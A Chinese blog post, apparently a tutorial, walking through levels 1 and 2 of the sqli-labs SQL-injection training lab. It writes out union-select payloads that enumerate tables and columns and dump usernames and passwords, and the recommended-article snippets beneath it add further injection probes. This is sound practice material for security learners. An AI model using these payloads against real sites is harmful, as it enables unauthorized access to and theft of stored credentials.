SQL注入之sqli-labs-master靶场第1、2关

最新推荐文章于 2024-03-11 21:00:07 发布
最新推荐文章于 2024-03-11 21:00:07 发布
阅读量857 收藏
点赞数
文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24797991/article/details/129942424
版权

一、SQL注入简介
        SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,实现欺骗数据库服务器执行非授权的任意查询,得到相应的数据信息。

二、SQL注入原理
        SQL注入攻击是修改SQL语句,达到执行代码对数据库进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命令的过程。

三、环境准备

        1、安装小皮phpstudy_pro

        2、安装sqli-labs-master

        3、运行小皮的MySQL数据库服务(MySQL5.0以上版本,该版本含有information_schema数据库,库中有三个重要的表:1)schemata存储数据库信息; 2)tables存储表信息; 3)columns存储字段信息)

        准备完成后,打开sqli-labs-master页面第2关(第1关与第2关类似,第1关为注入类型为字符型,第2关为整型):

三、SQL注入过程

 1、判断注入类型。修改URL参数,在后面添加?id=1,查看回显正常,说明为整型。 2、判断注入点。任意输入id,确认是否存在注入点(返回错误存在,无返回值则不存在)

3、确认存在注入点,猜解列名数量:  index.php?id=1 order by 1(填4报错,说明只有3列)

       index.php?id=1 order by

4、 使用数据库联合查询命令(union),查看回显点:index.php?id=1 union select 1,2,3(如下:2,3字段有返回信息)

index.php?id=1 union select 1,2,3

5、利用回显点进行信息收集。使用数据库联合查询命令(union),查看数据库版本及数据库名:

index.php?id=-1 union select 1,version(),database()

 6、使用对应SQL注入命令

(1)根据数据库名,获取表名:

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'(库名)

(2)依据表名,查看字段信息

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'(表名)

 (3)根据字段信息,获取账号密码

union select 1,group_concat(username),group_concat(password) from users

(4)真实数据库表字段内容如下:

诗诗奶爸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs-master靶场搭建,1-10详解
GN_QT的博客
08-02 1122
输入数字id =1 and 1=2 --+ 没有报错 尝试了 ' " ') ")id=1' --+ 有回显,但是sql语句都被注释了,不能使用报错注入。id=1') and 1=2 --+再判断数据库名第一位是否大于'a',直到s才报错,说明第一位是s。到4的时候才发生报错,说明一共有三个字段,接下里判断显示字段。时间盲注是猜解正确,页面快速返回,猜解错误,则按照规定时间返回。判断是否由字符注入,输入单引号,双引号进行测试,id=1 and 1=2。实现了报错,") and 1=2 --+
Sqli-labs-master 1-20|基础篇——详细Write up
Leaf_initial的博客
07-25 219
Order by判断显示位可以看出显示位是3然后构造payload爆库,爆表爆字段结束。
sql注入靶场环境配置
最新发布
Zqinglele的博客
03-11 1119
1.从官网下载:http://www.xp.cn2.选择windows版(点击立即下载后再选择64位下载即可3.打开下载好的安装包这里是先在win10(本机)上下载解压完成复制到windows server 2008(虚拟机)里4.安装应用程序点击确定5.等待安装完成即可。
SQL注入靶场搭建(Sqli-labs)
Bluetuan的博客
01-10 472
如果PHP版本符合5.x则可以跳过这几步不看。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs-master超详细通教程(1-23|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
SQL&sqli-labs-master
Jackie's Blog
04-03 669
SQL注入学习&个人sqli-labs-master靶场练习
048 SQL注入实验——sqli-labs-mastersqlmap自动化
鸡蛋炒鸡蛋
03-03 1497
文章目录一:sqli-labs-master的部署二:sqli注入2.1:笔记篇2.2:实操过程less-01less-02less-03less-04less-05less-06less-07less-08less-09三:sqlmap自动化注入 一:sqli-labs-master的部署 这里给到大家一个下载地址: sqli-labs-master (访问密码:zUw77A) 下载之后解压之后得到一个文件 把该文件夹放到已经安装好的phpstudy/www文件目录下 如何安装phpstudy,请参
CenOS6.5搭建sqli-labs-master靶场环境
weixin_42566218的博客
02-17 1759
目录 一、靶场搭建环境准备 二、搭建过程 0x1 配置本地软件仓库 0x2 安装sqli-labs支持服务 0x3 部署sqli-labs靶场 三、测试sqli-labs靶场环境 一、靶场搭建环境准备 sqli-labs-master是一套结合http+php+mysql环境的sql注入练习平台,里面有丰 富的sql注入靶场环境 虚拟机软件: VMware® Workstation 16 Pro...
[sqli-labs-master]环境安装步骤
weixin_44723534的博客
03-19 4864
[sqli-labs-master]前提条件已搭建phpstudy 一、解压sqli-labs-master文件到指定路径 路径是有要求的,要放到PhpStudy某个指定路径下 二、通过浏览器打开 http://192.168.6.142/sqli-labs-master/ 三、初始化数据库环境 3.1 密码不存在,需设置密码 3.2 修改配置文件 路径:C:\PhpStudy2018\PHPTutorial\WWW\sqli-labs-master\sql-connections 文件名:db-c
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
pikachu之SQL注入
qq_58091216的博客
11-04 2232
SQL注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
SQL注入【ByPass有点难的靶场实战】(九)
12-30 1009
SQL注入【ByPass有点难的靶场实战】
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1730
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
web安全 sql注入环境-DVWA搭建-day01
m0_68167825的博客
06-09 257
DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,旨在为安全专业人员测试自己的专业技能和工具提供合法的 环境,帮助Web开发者更好的理解Web应用安全防范的过程。因为这里是实验环境,所以我们使用可以方便快捷的搭建方式 一键启动WNMP(Windows;nginx;mysql;php) 启动phpstudy以后将下载的DVWA源码解压并放入到F:/xiaopi/phpstudy_pro/WWW/hzy中(根据自己小皮目录选择) ![在这里插入图片描述]
Pikachu的sql数字型注入
m0_63152656的博客
09-24 398
pikachu的sql数字型注入 及 终端打开小皮数据库
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值